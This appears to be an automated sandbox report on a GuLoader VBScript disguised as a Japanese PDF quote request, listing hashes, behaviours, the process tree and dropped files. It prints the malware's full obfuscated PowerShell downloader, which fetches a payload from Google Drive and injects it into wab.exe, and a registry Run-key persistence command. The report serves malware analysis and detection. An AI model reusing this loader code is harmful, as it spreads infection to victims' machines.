Resubmissions
25/03/2024, 12:08
240325-paxg5sfb28 1025/03/2024, 11:42
240325-nvebmahe4v 1025/03/2024, 02:20
240325-csg4ysgd6s 10Analysis
-
max time kernel
121s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
25/03/2024, 02:20
Static task
static1
Behavioral task
behavioral1
Sample
見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.vbs
Resource
win10v2004-20240226-en
General
-
Target
見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.vbs
-
Size
181KB
-
MD5
5abfcbce1f90501808379e179feb51c8
-
SHA1
e305ee8202f579517fe0634e22346584aaf4c148
-
SHA256
7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e
-
SHA512
616becc5031d7b1d3e0b08b86a7a90b8a354a2357fe0fafe6e0e16c094eadfea2362452e32169b32f322b2c06e11c79b6220a40c8bd46be7dde21d086c7c2a5b
-
SSDEEP
3072:XPvtrVR7t/zhP5AbvMZoxnRcRKKh14t8EIuvQcVi1l8ok/1fyLbvj/3s0oV++hyC:/vdVR7tLhxAbvMZoxnRcsK3M8EIOQcVJ
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2160 WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\\Hooves\\').Handelsordreregistret;%Melaxuma% ($Ladys)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 6 drive.google.com 7 drive.google.com 11 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 2612 wab.exe 2612 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1264 powershell.exe 2612 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1264 set thread context of 2612 1264 powershell.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
pid Process 2660 reg.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2936 powershell.exe 1264 powershell.exe 1264 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1264 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2936 powershell.exe Token: SeDebugPrivilege 1264 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2160 wrote to memory of 2936 2160 WScript.exe 28 PID 2160 wrote to memory of 2936 2160 WScript.exe 28 PID 2160 wrote to memory of 2936 2160 WScript.exe 28 PID 2936 wrote to memory of 1896 2936 powershell.exe 30 PID 2936 wrote to memory of 1896 2936 powershell.exe 30 PID 2936 wrote to memory of 1896 2936 powershell.exe 30 PID 2936 wrote to memory of 1264 2936 powershell.exe 32 PID 2936 wrote to memory of 1264 2936 powershell.exe 32 PID 2936 wrote to memory of 1264 2936 powershell.exe 32 PID 2936 wrote to memory of 1264 2936 powershell.exe 32 PID 1264 wrote to memory of 2056 1264 powershell.exe 33 PID 1264 wrote to memory of 2056 1264 powershell.exe 33 PID 1264 wrote to memory of 2056 1264 powershell.exe 33 PID 1264 wrote to memory of 2056 1264 powershell.exe 33 PID 1264 wrote to memory of 2612 1264 powershell.exe 34 PID 1264 wrote to memory of 2612 1264 powershell.exe 34 PID 1264 wrote to memory of 2612 1264 powershell.exe 34 PID 1264 wrote to memory of 2612 1264 powershell.exe 34 PID 1264 wrote to memory of 2612 1264 powershell.exe 34 PID 1264 wrote to memory of 2612 1264 powershell.exe 34 PID 2612 wrote to memory of 2472 2612 wab.exe 35 PID 2612 wrote to memory of 2472 2612 wab.exe 35 PID 2612 wrote to memory of 2472 2612 wab.exe 35 PID 2612 wrote to memory of 2472 2612 wab.exe 35 PID 2472 wrote to memory of 2660 2472 cmd.exe 37 PID 2472 wrote to memory of 2660 2472 cmd.exe 37 PID 2472 wrote to memory of 2660 2472 cmd.exe 37 PID 2472 wrote to memory of 2660 2472 cmd.exe 37
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ironiserende Imborder Hulheden Peabird Lnkens Anstdssten #>;$Pebermynters=(cmd /c set /A 115^^0);Function albertuss ([String]$Armariolum215){$Pebermynters=[char][int]$Pebermynters;$Stikpiller=$Pebermynters+'ubstring';$Mistletoes=8;$Afhudes=Ridefogders($Armariolum215);For($Coapprover=7; $Coapprover -lt $Afhudes; $Coapprover+=$Mistletoes){$Dendropogon=$Armariolum215.$Stikpiller.Invoke($Coapprover, 1);$Konsistorialkontor=$Konsistorialkontor+$Dendropogon;}$Konsistorialkontor;}function Reflectorizing ($Frsteviolin){. ($Rebuffably) ($Frsteviolin);}function Ridefogders ([String]$Sagregisteret){$Enucleator=$Sagregisteret.Length-1;$Enucleator;}$Iatrochemical=albertuss ' RegistTEkspertrContradaHypothenSabelkas ,insenf BoppeneIncongrrBaadskar,enzinti randlonPr,gresg Ag rsk ';$Mynas248=albertuss 'JennifehPredicttExtremitUnm.ddlpMalkendsAurined:Addi,en/attaina/ Zonet dMetamorrIncir,ui OvereavNeuro.aeg.nandr. Indregg GangshoMu keorohemielygChimangl OrbitseUdebliv.PitchpocInterbloElsewismSyvstje/Caratesu PulvercAfklaps?svendepe Byplanx FormprpAkasastoAnaerobr Ver,entBloddon=StephandBazonbuoBughindw Hindign ExocyclThermo o Dueu ta CormacdIndkald&.ectumciAtelierd Narrat=Kveller1Tr nchctAttribunOvervioXd gpengrConvexiXBekranscCowli,ehEndu eovGleaminMBesmokeoPomaryuxGingerlF.ikkestTP,colete skatebWScuddl 7OutdariSLyophillSt.vens3 samariF Ma,vasRArmadae0SkippenmUd.ikli9ri.striy No,trawVestas.4RepaireO agocy3 WranglxFidusku2 C.rameXHollywo ';$Rebuffably=albertuss 'QuintusiSauerkrekvoterexfys,ote ';$Gooseskin=albertuss 'Indko,t$,nderbegSkrofu l FactuaoBastonabPlanetgaUnmeedyl Sieurs:FoleykuPExtenderBrayekoeSubnatua KontincZethstehExclaimeCurnst sMander Sk,somm=Film nd UnsizedS BoghantNigeriaaThermosrPhutplat Forpl.-HathawaBTheodidiEndossetDybl rnsFacitteT minsterM sonsbaFle.gudn MalerlsMultisefNothinge ForstrrKon.ito Underdi-GarageaSSubstano D.urwau An epar Rohanlc ball.teCockney Sideord$A.choreMOpvarmey I,termnhelicota Simu.asNastali2Tr ndse4Renegot8ltgbeck Barrela-KommentD Tekstbe Indb.ss Ventelt VialfuiUngskuen Enter,aSmugkrotKvk eneiImpedimoInf,acenFendill Unci l$Crunc iS Aoua sc ckeeinhRavespoiCorditizHabitaboGerrigtmSuperdeeGenopnardittiesiGadroona Papste ';Reflectorizing (albertuss 'Droumy,$JernfilgIm.odyil offosoLatrantbSkrmstyaD iverel Megaby:StudebaS telepac,egentshSpelliniTronfraztilfileo.isacchmMat.ikeeDhikrsgrFistelsiForfatta Finans=Escadri$LithopheAcidaspnCoregnavUnassai:CyklonbahovedskpFa,keltp TricoldForsy,iaL.vordet remun.aCoun er ') ;Reflectorizing (albertuss 'WienerpIPachy.emZ osporpCytoanaoPseudoprPregaintDr.kneu-SaucepaMOrlogs.oPplretedUndivulu atomf,lAttentie Sauced Cul,asuBPreexchiR mfiretKej,haasMargentTSvrindurCellarea,loakstnWrinklesSt.tikefOrdrerse oct.merAcetona ') ;$Schizomeria=$Schizomeria+'\Bjdens.Ant' ;Reflectorizing (albertuss 'Impa si$popp.ydgForbog,lA,rsagso strobobLoud rbaSneplovlTju.hne: PreconFholarctr DaahinoD.spitusTab lattCombinef Fangstr KaabesiAcajou e DermossSkaberg=propful(Do.beltTInputsteUn.hospsvernonitRuedesc- OliehoPRynkes,aHo,semotEnt,robhRegiste Pharmac$MegaaraSStjernecOver,tthGo,otheiAfskallzKalendeo isorlimPlannedeAfrignirIndkrediFerdiadaBilleds)gormssk ') ;while (-not $Frostfries) {Reflectorizing (albertuss 'Dis ikoIKabsminfFerashs Mon cid(Stormpr$Jg.rsprPFran,kgrIns.lare JiffphaMy.midoc Rit,alh SlangeeSmykkeasFlui.um.Pikt,grJGodkendoTilemakbConferrSHjforrdtA.tokraa RelatitIrasja e Bestse Bunomas-Puk,erheSailyfaqR micat Forske$HalvhedI Ba,kgaaGazernetMishandrAbstineoavisartcGaaretnhHerpesteHeterosmIndbe eiHjlan scKursor.aSaddelml Mammit)Faklen Fortykk{CanafisSInterkitSu erhea Sspejdr Mone.atVetkous-SvedsbySDiagonalBeskydeePointere BambuspMoyit s I.comme1 shiesp}Fjor,reeTjenestlOomancysSoldateeDybdahl{ Tro,heS KondictForkobraBekosterSocialatSanguif- ConchoSEnkeltvlFlygtnieSyno,yme Se.skapKa,abas Delumin1Pigenav;Dobbe rR Diquate ReprodfAndaluslSpati teVideregc Toxifet Udsta.o ,outgjrAnnihili Ant,pazGrundtaidjvlehon iolsflg.hamabl Balloan$ QuelchG Besu.loMetricaoNon,arrsS.aansoeFlimsyssFotoalbkBrillefiMomsersnUnfoxy.}ulovmed ');Reflectorizing (albertuss 'Brnds.l$Hugger,g O ertilOch,mysoRetreatbSkrivesaFor,ikllAfvikli:Unvnel.FParrotsr PedelloB weryls RodenstAffarvef Aley.rr skilniimanac seMismatcsMakvrke=overado(SvartbaTminimereGr.tuitsunddragtpre ect-PortepePRemplacaImprgnetAlbedogh Pe.hyd Hitherw$SpingelSRingstec KolerihObskurfi DressrzSaccomyoUninhibmVarmefreDiphyllrUover,oi Lint.laKapacit)Hjlpepr ') ;}Reflectorizing (albertuss 'Her.eli$ Skon egsubstanlSanatoroHaandhvbCorrivaaTwitchel orrupt:BestialaRibbonenAflnni,tpen estiHypoders F,rtrycInfrasphXylof,noSwollenl L,anabaHalimous rappitTho,ougi Rewardc Rumm naForcibllRet inilHyperthyyagouru Afblegn=Spizzer ForvarmGAtomulyeReprimat Ugelan-AvertdeC NemospoForm ivnAuthorit nlbenpeskilrednBesvrlitSouveni Ron edo$HalvgudSGuldrancTjurhnehMelis aiFriz,grz TilhngoInterprmBeyli.aeE.stemprDeglam.iBgededea,jrnsol ');Reflectorizing (albertuss 'Headsai$ ForesogSynkronlNyttevioUforgngbOceanolaExquisilDrmmesy: Int,rmBUnivocae mennesfAr illeoCy niderRa,iospdUnreturrEuropewiUdenlann BendtlgKarolinsPrsen,am EarpiciLousedtdUnikkesl AfklapeIsoclinrSavedes2D.missi0affress1Armeni, .anebor=Coconu. ,ildoe[ StybbaSCh onicyComproms DinarztP,anetaeFlagermm Resinr. BornhoCKvivaleoMetastanEgelkkevBambu reRaisedarStampemtPutativ]Utu.ten:Gennemb:ElectroF Age.dar Ol enbo Subpiam Sop.edB angensaTactualsKondoleeBlndvrk6 udesth4OligospS BredbatMislighrSwordm,iAdolphcnflorifig svajry(Evoluti$Del.algaIndtrkknFormrketPropolsiRoughlesHol quicPreferehFr.sepuo,nytninl H rregaSolcellsMy tiqutKonneksiTricarbcrkeen.eaBitte.ll,lagterlMarblieyFladetp) Volumi ');Reflectorizing (albertuss ' esecti$Sin.erlgUncocksl ,atrilo Meg spbSuperdua Stern.lAl onym: Wit.edB Nomadel Vol.nttGeosciee Ti sspsFruticut ZygobreKildetedSpirit.eNeologirHeterolsLakerer Tyrerin=Opspori Trafika[InkonseSTrolde yS rannesArchductUnpervee DiphthmHarmoni. Fjer,kTPigmentevisernexUndershtPistill. Er.ticEKaolinsnRe.eldic PartreoAspirandOveranaiTros.amnKoda.isgBerigei]Maddike:Skyndte:PrettyiAKnbjninSMicromeCTnderenI BogsidIUnfooli..ennemsGRedninge OvervitRaafrugSAthrocytCon inurBathyali gazolynFetichigTapestr(.utobio$ ValutaBApathieeZoologifIncaveroLaputapr discladKattefjrVi orisiDraconin.isarmegKaoli,is Urege.m P.rensi Foruredsprng,rl Fusarie UnsocirSte mti2Indhyll0hemmeli1Pollina)Polyr.y ');Reflectorizing (albertuss ' Naturs$UnpagangPro andl Gener onedga,gb SprngsaProbosclEnkelta: EmanerMSovietioOutshamd HammedvKolkhosiCuratiznPragmatdTamponeePurinsbnDrivmid=transvo$RejfernBCand,lllPampin t Neutrae GenoptsAdiaphotThroatle ummertdSalleeteHemocoer Rebaptstimingf.BimahvasNotifi,u Empa sbBo ardosFissipetReferrerpree.apiResi.uan,entefrgDommerk(Kderege3Taragec5Legemli0 Udmeld4Spoke,w3Magneti9Rengjo , Cynanc3Afskrab1 Unperc7gymnasi5 Ukorre0Praefik)Bronkos ');Reflectorizing $Modvinden;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c set /A 115^^03⤵PID:1896
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Ironiserende Imborder Hulheden Peabird Lnkens Anstdssten #>;$Pebermynters=(cmd /c set /A 115^^0);Function albertuss ([String]$Armariolum215){$Pebermynters=[char][int]$Pebermynters;$Stikpiller=$Pebermynters+'ubstring';$Mistletoes=8;$Afhudes=Ridefogders($Armariolum215);For($Coapprover=7; $Coapprover -lt $Afhudes; $Coapprover+=$Mistletoes){$Dendropogon=$Armariolum215.$Stikpiller.Invoke($Coapprover, 1);$Konsistorialkontor=$Konsistorialkontor+$Dendropogon;}$Konsistorialkontor;}function Reflectorizing ($Frsteviolin){. ($Rebuffably) ($Frsteviolin);}function Ridefogders ([String]$Sagregisteret){$Enucleator=$Sagregisteret.Length-1;$Enucleator;}$Iatrochemical=albertuss ' RegistTEkspertrContradaHypothenSabelkas ,insenf BoppeneIncongrrBaadskar,enzinti randlonPr,gresg Ag rsk ';$Mynas248=albertuss 'JennifehPredicttExtremitUnm.ddlpMalkendsAurined:Addi,en/attaina/ Zonet dMetamorrIncir,ui OvereavNeuro.aeg.nandr. Indregg GangshoMu keorohemielygChimangl OrbitseUdebliv.PitchpocInterbloElsewismSyvstje/Caratesu PulvercAfklaps?svendepe Byplanx FormprpAkasastoAnaerobr Ver,entBloddon=StephandBazonbuoBughindw Hindign ExocyclThermo o Dueu ta CormacdIndkald&.ectumciAtelierd Narrat=Kveller1Tr nchctAttribunOvervioXd gpengrConvexiXBekranscCowli,ehEndu eovGleaminMBesmokeoPomaryuxGingerlF.ikkestTP,colete skatebWScuddl 7OutdariSLyophillSt.vens3 samariF Ma,vasRArmadae0SkippenmUd.ikli9ri.striy No,trawVestas.4RepaireO agocy3 WranglxFidusku2 C.rameXHollywo ';$Rebuffably=albertuss 'QuintusiSauerkrekvoterexfys,ote ';$Gooseskin=albertuss 'Indko,t$,nderbegSkrofu l FactuaoBastonabPlanetgaUnmeedyl Sieurs:FoleykuPExtenderBrayekoeSubnatua KontincZethstehExclaimeCurnst sMander Sk,somm=Film nd UnsizedS BoghantNigeriaaThermosrPhutplat Forpl.-HathawaBTheodidiEndossetDybl rnsFacitteT minsterM sonsbaFle.gudn MalerlsMultisefNothinge ForstrrKon.ito Underdi-GarageaSSubstano D.urwau An epar Rohanlc ball.teCockney Sideord$A.choreMOpvarmey I,termnhelicota Simu.asNastali2Tr ndse4Renegot8ltgbeck Barrela-KommentD Tekstbe Indb.ss Ventelt VialfuiUngskuen Enter,aSmugkrotKvk eneiImpedimoInf,acenFendill Unci l$Crunc iS Aoua sc ckeeinhRavespoiCorditizHabitaboGerrigtmSuperdeeGenopnardittiesiGadroona Papste ';Reflectorizing (albertuss 'Droumy,$JernfilgIm.odyil offosoLatrantbSkrmstyaD iverel Megaby:StudebaS telepac,egentshSpelliniTronfraztilfileo.isacchmMat.ikeeDhikrsgrFistelsiForfatta Finans=Escadri$LithopheAcidaspnCoregnavUnassai:CyklonbahovedskpFa,keltp TricoldForsy,iaL.vordet remun.aCoun er ') ;Reflectorizing (albertuss 'WienerpIPachy.emZ osporpCytoanaoPseudoprPregaintDr.kneu-SaucepaMOrlogs.oPplretedUndivulu atomf,lAttentie Sauced Cul,asuBPreexchiR mfiretKej,haasMargentTSvrindurCellarea,loakstnWrinklesSt.tikefOrdrerse oct.merAcetona ') ;$Schizomeria=$Schizomeria+'\Bjdens.Ant' ;Reflectorizing (albertuss 'Impa si$popp.ydgForbog,lA,rsagso strobobLoud rbaSneplovlTju.hne: PreconFholarctr DaahinoD.spitusTab lattCombinef Fangstr KaabesiAcajou e DermossSkaberg=propful(Do.beltTInputsteUn.hospsvernonitRuedesc- OliehoPRynkes,aHo,semotEnt,robhRegiste Pharmac$MegaaraSStjernecOver,tthGo,otheiAfskallzKalendeo isorlimPlannedeAfrignirIndkrediFerdiadaBilleds)gormssk ') ;while (-not $Frostfries) {Reflectorizing (albertuss 'Dis ikoIKabsminfFerashs Mon cid(Stormpr$Jg.rsprPFran,kgrIns.lare JiffphaMy.midoc Rit,alh SlangeeSmykkeasFlui.um.Pikt,grJGodkendoTilemakbConferrSHjforrdtA.tokraa RelatitIrasja e Bestse Bunomas-Puk,erheSailyfaqR micat Forske$HalvhedI Ba,kgaaGazernetMishandrAbstineoavisartcGaaretnhHerpesteHeterosmIndbe eiHjlan scKursor.aSaddelml Mammit)Faklen Fortykk{CanafisSInterkitSu erhea Sspejdr Mone.atVetkous-SvedsbySDiagonalBeskydeePointere BambuspMoyit s I.comme1 shiesp}Fjor,reeTjenestlOomancysSoldateeDybdahl{ Tro,heS KondictForkobraBekosterSocialatSanguif- ConchoSEnkeltvlFlygtnieSyno,yme Se.skapKa,abas Delumin1Pigenav;Dobbe rR Diquate ReprodfAndaluslSpati teVideregc Toxifet Udsta.o ,outgjrAnnihili Ant,pazGrundtaidjvlehon iolsflg.hamabl Balloan$ QuelchG Besu.loMetricaoNon,arrsS.aansoeFlimsyssFotoalbkBrillefiMomsersnUnfoxy.}ulovmed ');Reflectorizing (albertuss 'Brnds.l$Hugger,g O ertilOch,mysoRetreatbSkrivesaFor,ikllAfvikli:Unvnel.FParrotsr PedelloB weryls RodenstAffarvef Aley.rr skilniimanac seMismatcsMakvrke=overado(SvartbaTminimereGr.tuitsunddragtpre ect-PortepePRemplacaImprgnetAlbedogh Pe.hyd Hitherw$SpingelSRingstec KolerihObskurfi DressrzSaccomyoUninhibmVarmefreDiphyllrUover,oi Lint.laKapacit)Hjlpepr ') ;}Reflectorizing (albertuss 'Her.eli$ Skon egsubstanlSanatoroHaandhvbCorrivaaTwitchel orrupt:BestialaRibbonenAflnni,tpen estiHypoders F,rtrycInfrasphXylof,noSwollenl L,anabaHalimous rappitTho,ougi Rewardc Rumm naForcibllRet inilHyperthyyagouru Afblegn=Spizzer ForvarmGAtomulyeReprimat Ugelan-AvertdeC NemospoForm ivnAuthorit nlbenpeskilrednBesvrlitSouveni Ron edo$HalvgudSGuldrancTjurhnehMelis aiFriz,grz TilhngoInterprmBeyli.aeE.stemprDeglam.iBgededea,jrnsol ');Reflectorizing (albertuss 'Headsai$ ForesogSynkronlNyttevioUforgngbOceanolaExquisilDrmmesy: Int,rmBUnivocae mennesfAr illeoCy niderRa,iospdUnreturrEuropewiUdenlann BendtlgKarolinsPrsen,am EarpiciLousedtdUnikkesl AfklapeIsoclinrSavedes2D.missi0affress1Armeni, .anebor=Coconu. ,ildoe[ StybbaSCh onicyComproms DinarztP,anetaeFlagermm Resinr. BornhoCKvivaleoMetastanEgelkkevBambu reRaisedarStampemtPutativ]Utu.ten:Gennemb:ElectroF Age.dar Ol enbo Subpiam Sop.edB angensaTactualsKondoleeBlndvrk6 udesth4OligospS BredbatMislighrSwordm,iAdolphcnflorifig svajry(Evoluti$Del.algaIndtrkknFormrketPropolsiRoughlesHol quicPreferehFr.sepuo,nytninl H rregaSolcellsMy tiqutKonneksiTricarbcrkeen.eaBitte.ll,lagterlMarblieyFladetp) Volumi ');Reflectorizing (albertuss ' esecti$Sin.erlgUncocksl ,atrilo Meg spbSuperdua Stern.lAl onym: Wit.edB Nomadel Vol.nttGeosciee Ti sspsFruticut ZygobreKildetedSpirit.eNeologirHeterolsLakerer Tyrerin=Opspori Trafika[InkonseSTrolde yS rannesArchductUnpervee DiphthmHarmoni. Fjer,kTPigmentevisernexUndershtPistill. Er.ticEKaolinsnRe.eldic PartreoAspirandOveranaiTros.amnKoda.isgBerigei]Maddike:Skyndte:PrettyiAKnbjninSMicromeCTnderenI BogsidIUnfooli..ennemsGRedninge OvervitRaafrugSAthrocytCon inurBathyali gazolynFetichigTapestr(.utobio$ ValutaBApathieeZoologifIncaveroLaputapr discladKattefjrVi orisiDraconin.isarmegKaoli,is Urege.m P.rensi Foruredsprng,rl Fusarie UnsocirSte mti2Indhyll0hemmeli1Pollina)Polyr.y ');Reflectorizing (albertuss ' Naturs$UnpagangPro andl Gener onedga,gb SprngsaProbosclEnkelta: EmanerMSovietioOutshamd HammedvKolkhosiCuratiznPragmatdTamponeePurinsbnDrivmid=transvo$RejfernBCand,lllPampin t Neutrae GenoptsAdiaphotThroatle ummertdSalleeteHemocoer Rebaptstimingf.BimahvasNotifi,u Empa sbBo ardosFissipetReferrerpree.apiResi.uan,entefrgDommerk(Kderege3Taragec5Legemli0 Udmeld4Spoke,w3Magneti9Rengjo , Cynanc3Afskrab1 Unperc7gymnasi5 Ukorre0Praefik)Bronkos ');Reflectorizing $Modvinden;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1264 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c set /A 115^^04⤵PID:2056
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\Hooves\').Handelsordreregistret;%Melaxuma% ($Ladys)"5⤵
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\Hooves\').Handelsordreregistret;%Melaxuma% ($Ladys)"6⤵
- Adds Run key to start application
- Modifies registry key
PID:2660
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
67KB
MD5753df6889fd7410a2e9fe333da83a429
SHA13c425f16e8267186061dd48ac1c77c122962456e
SHA256b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA5129d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5d285385e715ad68925e243169ddd15a9
SHA193e09d0495dfa02274729834abe00b82fea8861f
SHA256032757ee357e7814d9f78ab444749b9ffb5353d5da8ce9ac364689524b52801d
SHA512bc2326fc8f62e3330a324c69b2aa2015bccac8a45e6e4320d921b973d11493aac87d3c7c82d615ee5271698a019c57c83bdee18a24d2e36151849cfb813a391b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5a5ee3ba6bb49adc10df573ec5d6e3f56
SHA11b15d38552e7f7b01c912045ad5e63fd54da515f
SHA256bce2802f8d5b17ae7ddb844063739a205bc551cd09f5f6fcb545f2f12358bbf0
SHA5122c640ac2e5e872ba16b93dd0f15e6704c95799cdbc8cb64edbed9af92fcf601961fc8898949c390d5782a808f90c2cf77d77dd7d75f31e6c2fdcad4bb0882963
-
Filesize
3KB
MD53b4e519bc2e1403308dd32e86bfe5ebb
SHA14f4e10e7488002018d08a6394ca9bd5415092eb0
SHA256b459de54b3087aae4caa62cc401e32890d74a21b82d54214278d9a1a766c1d4d
SHA51292b61a709de13a2f00d1e14f435f3452a217e6532266f4dca8e355d21ae3f0e4c55e5b80083c5aac7c28e66315778515efa0c6dc1bef4ed15ea09cdce71442eb
-
Filesize
4KB
MD5b96c43977624c9530dc17092a152b4c1
SHA1671db91d8975021ce89f8624f8eb55183122c903
SHA2568f16e6b6c9b59ac000b7d33dff34cb0f3f1adec2f9e20956937ea095eae4a4e6
SHA51204bfbfa3a5904fef2ced10a1aaa3796c2998fdece2f78b192ae87e28231c3b84692d58b3cae9c23fdb5fc104dd52ddd802691f67506ec5a6f05c944850f707c5
-
Filesize
4KB
MD547cf13df45cb4a35d179a899e59fc260
SHA155cab64409c34750613bcd3dd8921e7304c45e75
SHA256a92ce4f062526a14d9c3d675af7522529aada0c41764f2c990a377b369edc3d4
SHA512d5a6efe9e50c2f00a9574a399d2744a98f199405fb2efba8354b623c1c24cf09c1ace9248999b7b7fcfd1de85a8aeeedd81187ef881569f17fd3b5392cfd2f94
-
Filesize
832B
MD5fbcc83204d974e4429197b16054b0389
SHA169ca22768734c366d305a1f9fc82319559de3853
SHA25691eb17e031e50edb5c99a35648bc8fa56170262b3b47b55c2bea32d1e5cacb86
SHA512cf525956a09810d5acc465b9e5415a7eb704535b33740e2c7dfc473cbe028801bcf74dc2a4db22364e0890ca54432e4018bcc87d9f68fe27d4fea82944e6be4d
-
Filesize
175KB
MD5dd73cead4b93366cf3465c8cd32e2796
SHA174546226dfe9ceb8184651e920d1dbfb432b314e
SHA256a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\I44D2MGUHFQM4JXNU7BM.temp
Filesize7KB
MD5db3306a5977bd3ada8f0c942c8148fea
SHA141ab81bb2ef614e039067f7077242b5d3fbe4347
SHA2563da0ef40e5cbdc64c2517c275b61bf5675780340882f842f7fc1b0beead7380f
SHA512b8d1e6c1bb629dda4b25cc24312c6a86a46049f11341c0da7436fcfff4d9a946a9d94350a619c8b7d3f62ff212adf338ec8738ca8a85bc33fceaf3eec5b8e99f